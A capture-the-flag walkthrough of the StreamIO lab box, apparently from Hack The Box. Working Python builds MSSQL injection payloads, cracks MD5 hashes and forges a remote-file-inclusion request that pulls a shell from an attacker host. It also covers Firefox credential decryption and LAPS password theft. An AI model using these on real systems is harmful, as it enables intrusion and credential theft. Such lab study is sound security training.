
HTB - StreamIO

Machine Info

StreamIO is a medium machine that covers subdomain enumeration leading to an SQL injection, which is used to retrieve stored user credentials; these are cracked to gain access to an administration panel. The administration panel is vulnerable to LFI, which allows us to retrieve the source code of the administration pages and leads to identifying a remote file inclusion vulnerability, the abuse of which gains us access to the system. After the initial shell we use the SQLCMD command-line utility to enumerate databases and obtain further credentials used for lateral movement. As the secondary user we find a Firefox profile whose database contains saved credentials that can be extracted. Using the new credentials in BloodHound we discover that the user has the ability to add themselves to a specific group whose members can read LDAP secrets. Without direct access to that account, we use PowerShell to abuse this right, add ourselves to the `Core Staff` group, and then query LDAP to disclose the Administrator's LAPS password.

Enumeration


Scope

IP Address: 10.10.11.158

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack
80/tcp   open  http             syn-ack
88/tcp   open  kerberos-sec     syn-ack
135/tcp  open  msrpc            syn-ack
139/tcp  open  netbios-ssn      syn-ack
389/tcp  open  ldap             syn-ack
443/tcp  open  https            syn-ack
445/tcp  open  microsoft-ds     syn-ack
464/tcp  open  kpasswd5         syn-ack
593/tcp  open  http-rpc-epmap   syn-ack
3268/tcp open  globalcatLDAP    syn-ack
3269/tcp open  globalcatLDAPssl syn-ack
5985/tcp open  wsman            syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ nmap -p53,80,88,135,139,389,443,445,464,593,3268,3269,5985 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-09 09:09:22Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after:  2022-03-24T07:03:28
|_ssl-date: 2024-07-09T09:10:11+00:00; +7h00m03s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-09T09:09:33
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s

Before I start the enumeration process, I will add the hostnames from the Nmap script output (streamIO.htb and watch.streamIO.htb from the certificate's SAN, plus the host name DC) to /etc/hosts. Note the clock skew of about seven hours reported by Nmap: Kerberos only tolerates a few minutes of skew, so any Kerberos-based step later will need our clock synced to the DC first.

DNS Enumeration

I tried a zone transfer for streamIO.htb against the DNS server on port 53, but it failed.

RPC & SMB Enumeration

I got access denied when enumerating both services anonymously (null sessions are not allowed, and SMB signing is required).

KERBEROS Enumeration

Then I attempted to enumerate usernames through Kerberos pre-authentication responses, looking for a possible path, but nothing was found here either.

HTTP & HTTPS enumeration

http://10.10.11.158

https://10.10.11.158

I tried fuzzing subdomains (virtual hosts) over HTTP and found nothing; when I repeated the vhost fuzzing against HTTPS, I got a hit.

https://watch.streamIO.htb

I looked at Wappalyzer to see which technologies are in use. PHP caught my attention, as it is not common to run PHP on IIS, so I started directory fuzzing against https://watch.streamIO.htb

I also fuzzed for PHP files on https://streamIO.htb

https://streamIO.htb/login.php

I don't have any credentials yet, so I will come back to this page once I obtain some.

https://watch.streamIO.htb/search.php

It is a search function that looks up film names, presumably in a database table, so we can attempt SQL injection.

When I sent a simple payload, I got blocked by a security control in front of the application and redirected to:

blocked.php

So I can't use SQLMap (its default requests trip the filter) and I will continue manually.

Something interesting caught my attention here: when I type a word like man, it is matched on both sides.

It returns Batman and Anger Management, so the query wraps the term in wildcards, i.e. LIKE '%man%'.

The SQL query is probably something like this:

I can break out of the string with an input such as ';--

I was right: when I typed man';-- only titles ending in man (Batman) matched, because the closing quote and comment cut off the trailing %' of the original query and only the leading wildcard is left (LIKE '%man').

Let's build the injection. I increased the number of columns in UNION SELECT 1,2,... until the page rendered normally, which happened at six columns (union 1,2,3,4,5,6).

The second column is the one reflected in the page, so that is where I will place my queries.

So we're dealing with an MSSQL database; we can use the queries from this cheat sheet:

Get the user name:

Current Database:

We're on an MSSQL database, so one common attack vector is to make the SQL server authenticate to an SMB share we control and capture the NetNTLM hash of the account the service runs as. I tried it, but the hash I captured belonged to the machine account, which cannot realistically be cracked.

Continue to explore the database.

We're already in STREAMIO, so let's enumerate its tables.

Selecting * returned nothing (a UNION column can only carry a single value), but selecting username returned the list of usernames.

Selecting password returned the list of hashes, but copying them out of the page one by one would be a waste of time.

I looked at the response in Burp to find the HTML tag that wraps each hash.

So I will use curl to fetch the page and filter the hashes out of the HTML.

I will do the same for the usernames.
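The UNION extraction described above, as an added example that is not code from the write-up: it builds the payload for the reflected second column, parses the result elements out of the HTML the way the curl-and-filter step does, and runs an offline dictionary check on the hashes. It goes one step beyond the page by pulling username and hash in a single query (username+':'+password) so the pairs never have to be re-matched by hand. Assumptions not taken from the page: the search form field is called q, results are rendered in <h5> elements, the table is named users, and the hashes are unsalted MD5 (hashcat's auto-detect tells you; change md5hex if it reports otherwise). The HTML response, user names, passwords and word list below are constructed for the demo.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlencode

COLUMNS = 6       # UNION SELECT 1,2,...,6 is the first column count that rendered
REFLECTED = 2     # the second column's value is echoed back in the page
FORM_FIELD = "q"  # assumed name of the search form field (not from the page)


def union_payload(term, expr, table=None):
    """Close the LIKE '%<term>%' string, UNION our expression into the
    reflected column and comment out the trailing %' of the original query."""
    cols = [str(i) for i in range(1, COLUMNS + 1)]
    cols[REFLECTED - 1] = expr
    sql = f"{term}' UNION SELECT {','.join(cols)}"
    if table:
        sql += f" FROM {table}"
    return sql + "--"


def post_body(term, expr, table=None):
    """URL-encoded body for the POST to /search.php."""
    return urlencode({FORM_FIELD: union_payload(term, expr, table)})


class _Reflected(HTMLParser):
    """Collect the text content of every <tag> element in the response."""

    def __init__(self, tag):
        super().__init__()
        self.tag, self.values, self._inside = tag, [], False

    def handle_starttag(self, tag, attrs):
        if tag == self.tag:
            self._inside = True

    def handle_endtag(self, tag):
        if tag == self.tag:
            self._inside = False

    def handle_data(self, data):
        if self._inside and data.strip():
            self.values.append(data.strip())


def extract_reflected(html, tag="h5"):
    """Every value the injected column produced, one per result element."""
    parser = _Reflected(tag)
    parser.feed(html)
    return parser.values


def parse_pairs(values):
    """'user:hash' strings (from username+':'+password) -> {user: hash}."""
    return dict(v.split(":", 1) for v in values if ":" in v)


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def crack_md5(pairs, wordlist):
    """Offline dictionary attack on unsalted MD5 (what hashcat -m 0 does)."""
    lookup = {md5hex(w): w for w in wordlist}
    return {u: lookup[h] for u, h in pairs.items() if h in lookup}


# Constructed response for expr=username+':'+password; not data from the box.
SAMPLE_HTML = f"""<html><body>
<div class="card"><h5>alice:{md5hex('Summer2022')}</h5></div>
<div class="card"><h5>bob:{md5hex('letmein')}</h5></div>
<div class="card"><h5>carol:{md5hex('n0t-1n-the-w0rdlist')}</h5></div>
</body></html>"""
SAMPLE_WORDLIST = ["password", "Summer2022", "letmein"]

if __name__ == "__main__":
    print(post_body("man", "username+':'+password", "users"))
    cracked = crack_md5(parse_pairs(extract_reflected(SAMPLE_HTML)), SAMPLE_WORDLIST)
    for user, pw in cracked.items():
        print(f"{user}:{pw}")
```

Send the output of post_body with the same headers the browser uses; if the filter that redirects to blocked.php also catches UNION, the usual first move is to vary case and whitespace in the payload rather than reaching for sqlmap.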

Initial Access


The username list is too big for brute forcing, so I will check which of the names are real domain accounts by enumerating them against Kerberos.

Now I have a list of valid users and a list of hashes. Let's crack the hashes and then try the results against the valid users.

First, run hashcat without specifying a mode so it auto-detects the hash type.

Not all of the hashes cracked, but we will be fine with what we have.

Create a password list for brute forcing from the cracked passwords.

Unfortunately, I didn't get a hit when brute forcing the domain services with them.

Then I remembered the login.php page I had left behind because I had no credentials.

Intercept a login request, send it to Burp Intruder and run the attack with the user and password lists we have.

Fuzzing for '/admin' directory and parameters

https://streamio.htb/admin/master.php

The page complains about a missing parameter or similar, so let's fuzz for parameter names.

https://streamio.htb/admin/?debug=

I tried LFI in this parameter and got a hit: https://streamio.htb/admin/?debug=C:\Windows\System32\drivers\etc\hosts

I will use this vulnerability to read the source of master.php through the php://filter wrapper, base64-encoding the file so it is returned to us instead of being executed by the include.

Shell as yoshihide

The file checks that it has been included by another script; requested directly, it just exits.

Looking at the end of the code, it takes its input from a parameter named include in a POST request.

I will include master.php through https://streamio.htb/admin/?debug= (so the "included" check passes) and add the include parameter to the body of a POST request to meet the second condition.

We found LFI earlier, but RFI didn't work on the debug= parameter, so I will try RFI on the include parameter.

We got a hit, so let's create a webshell for ourselves.

I looked around the web root, found login.php and decided to look at its content.

I searched for other passwords that might exist and found one.

It's the password for the MSSQL database.
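The LFI-to-RFI chain above, as an added example rather than code from the write-up: it builds the php://filter URL for the debug= parameter, decodes the base64 that comes back out of the surrounding HTML, scans the recovered PHP for include-style sinks fed by request data, and assembles the one request that satisfies both guards (master.php pulled in via debug= so its "included" check passes, and the include parameter pointing at a remote file). The PHP below is a constructed stand-in for master.php with the guard and the sink the write-up describes, not the real file; ATTACKER and shell.php are placeholders.

```python
import base64
import re
from urllib.parse import urlencode

BASE = "https://streamio.htb/admin/"
ATTACKER = "http://ATTACKER/shell.php"  # placeholder for your own host


def php_filter_url(resource, base=BASE):
    """LFI URL that makes PHP return the file base64-encoded instead of
    executing it, so the source survives the round trip intact."""
    return f"{base}?debug=php://filter/convert.base64-encode/resource={resource}"


def decode_leaked(body):
    """Pick the longest base64 run out of the HTML around it and decode it."""
    blobs = re.findall(r"[A-Za-z0-9+/]{40,}={0,2}", body)
    if not blobs:
        raise ValueError("no base64 blob in response: wrong path, or blocked")
    return base64.b64decode(max(blobs, key=len)).decode()


_SINK = re.compile(r"\b(include|include_once|require|require_once|eval|file_get_contents)\s*\(")
_USER_INPUT = re.compile(r"\$_(POST|GET|REQUEST)\[")


def find_sinks(php_src):
    """(line number, line) for every include-style call fed by request data.
    Heuristic: both patterns must appear on the same source line."""
    return [(n, line.strip()) for n, line in enumerate(php_src.splitlines(), 1)
            if _SINK.search(line) and _USER_INPUT.search(line)]


def rfi_request(payload_url=ATTACKER, base=BASE):
    """One request that satisfies both guards: master.php is pulled in via
    debug= so its 'included' check passes, and the vulnerable POST parameter
    points at our remote file."""
    return {
        "method": "POST",
        "url": f"{base}?debug=master.php",
        "headers": {"Content-Type": "application/x-www-form-urlencoded"},
        "body": urlencode({"include": payload_url}),
    }


# Constructed stand-in for master.php: the guard and the sink described in
# the write-up, not the real file.
SAMPLE_PHP = """<?php
if (!defined('included'))
    die('Only accessible through includes');
// ... admin listing code ...
if (isset($_POST['include'])) {
    include($_POST['include']);
}
?>"""
SAMPLE_RESPONSE = ("<html><body><div class='debug'>"
                   + base64.b64encode(SAMPLE_PHP.encode()).decode()
                   + "</div></body></html>")

if __name__ == "__main__":
    print(php_filter_url("master.php"))
    src = decode_leaked(SAMPLE_RESPONSE)
    for n, line in find_sinks(src):
        print(f"master.php:{n}: {line}")
    print(rfi_request())
```

The remote file only works because the sink accepts a URL; if find_sinks reports an include with a fixed prefix or a basename() wrapper instead, the same request will fail and the chain would have to go through a local file you can write.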

Shell as nikk37

Let's examine the db with SQLCMD tool

Shorten our user list by keeping only the usernames that actually exist.

Only one hash was cracked, so it must belong to one of the two remaining users.

Confirm

User Flag: a00c4e521d2bed26c166xxxxxxxxxxxxx


Privilege Escalation

I found that Mozilla Firefox is installed on the system, so I looked at the user's Firefox profile and copied it to my Kali machine to decrypt the saved logins and cookies (the files that matter are key4.db and logins.json).

Start an SMB server on Kali to transfer the profile.

I change directory into the profile folder copied from the Windows box and run firepwd.py to decrypt the Firefox secrets.

I found some credentials; let's try them against the accounts we have.

  • I fired up BloodHound to see what the user JDgodd can do and found the following:

    • JDgodd has WriteOwner on the CORE STAFF group, which lets us take ownership of the group, grant ourselves rights on it and add ourselves as a member

    • The CORE STAFF group has the right to read the LAPS password (the ms-Mcs-AdmPwd attribute) of the DC computer object

Let's list the commands we will use for that purpose (with PowerView: Set-DomainObjectOwner, Add-DomainObjectAcl, then Add-DomainGroupMember):

I personally use crackmapexec to pull the LAPS password.

An alternative way from the community is ldapsearch, reading the ms-Mcs-AdmPwd attribute directly.
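The ldapsearch route, as an added example that is not the write-up's own command: once JDgodd is in CORE STAFF the LAPS password is just an LDAP attribute, so this builds the ldapsearch invocation that reads it and parses the LDIF that comes back. Two details a practitioner trips over are handled: ldapsearch emits values that start with ':' or a space, or contain non-ASCII, in the "attr:: base64" form (LAPS passwords can start with such characters), and ms-Mcs-AdmPwdExpirationTime is a Windows FILETIME (100-ns ticks since 1601-01-01 UTC), which is converted to a real timestamp so you know whether the password is about to rotate. The LDIF below is constructed: the password in it is not the box's, and PASSWORD is a placeholder for JDgodd's credential.

```python
import base64
from datetime import datetime, timedelta, timezone

DC = "10.10.11.158"
BASE_DN = "DC=streamio,DC=htb"


def ldapsearch_argv(user="JDgodd", password="PASSWORD", dc=DC, base_dn=BASE_DN):
    """Simple bind as the (now CORE STAFF) user and ask only for computer
    objects whose LAPS password is readable by us."""
    return ["ldapsearch", "-x", "-H", f"ldap://{dc}",
            "-D", f"{user}@streamio.htb", "-w", password,
            "-b", base_dn, "(ms-Mcs-AdmPwd=*)",
            "ms-Mcs-AdmPwd", "ms-Mcs-AdmPwdExpirationTime"]


def parse_ldif(text):
    """LDIF -> list of {attr: value}. Unfolds continuation lines (leading
    space) and decodes the 'attr:: base64' form ldapsearch uses for values
    that start with ':' or ' ' or contain non-ASCII bytes."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, cur = [], {}
    for line in lines:
        if not line.strip() or line.startswith("#"):
            if cur:
                entries.append(cur)
                cur = {}
            continue
        if ":: " in line:
            attr, val = line.split(":: ", 1)
            val = base64.b64decode(val).decode("utf-8")
        elif ": " in line:
            attr, val = line.split(": ", 1)
        else:
            continue
        cur[attr] = val
    if cur:
        entries.append(cur)
    return entries


def filetime_to_dt(ft):
    """Windows FILETIME (100-ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=int(ft) // 10)


def laps_passwords(ldif):
    """Every entry that carries a LAPS password, with its expiry decoded."""
    return [{"dn": e["dn"], "password": e["ms-Mcs-AdmPwd"],
             "expires": filetime_to_dt(e["ms-Mcs-AdmPwdExpirationTime"])}
            for e in parse_ldif(ldif) if "ms-Mcs-AdmPwd" in e and "dn" in e]


# Constructed ldapsearch output; the password starts with ':' so it appears
# base64-encoded, exactly as ldapsearch would print it.
_PW = ":Qx7#mL2p!Zv9"  # made up for the demo, not the box's LAPS password
SAMPLE_LDIF = f"""# extended LDIF
#
# LDAPv3
# base <DC=streamio,DC=htb> with scope subtree
# filter: (ms-Mcs-AdmPwd=*)
# requesting: ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime
#

# DC, Domain Controllers, streamio.htb
dn: CN=DC,OU=Domain Controllers,DC=streamio,DC=htb
ms-Mcs-AdmPwd:: {base64.b64encode(_PW.encode()).decode()}
ms-Mcs-AdmPwdExpirationTime: 132905664000000000

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
"""

if __name__ == "__main__":
    print(" ".join(ldapsearch_argv()))
    for hit in laps_passwords(SAMPLE_LDIF):
        print(f"{hit['dn']}: {hit['password']} (expires {hit['expires'].isoformat()})")
```

The bind here goes over plain LDAP on 389, so the password travels in clear; that is acceptable on a lab network but on a real engagement bind over LDAPS instead. The global catalog on 3269 is not a substitute, since ms-Mcs-AdmPwd is not part of the partial attribute set it replicates.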

Root Flag: fcca05f1388d18d964521ce53582793
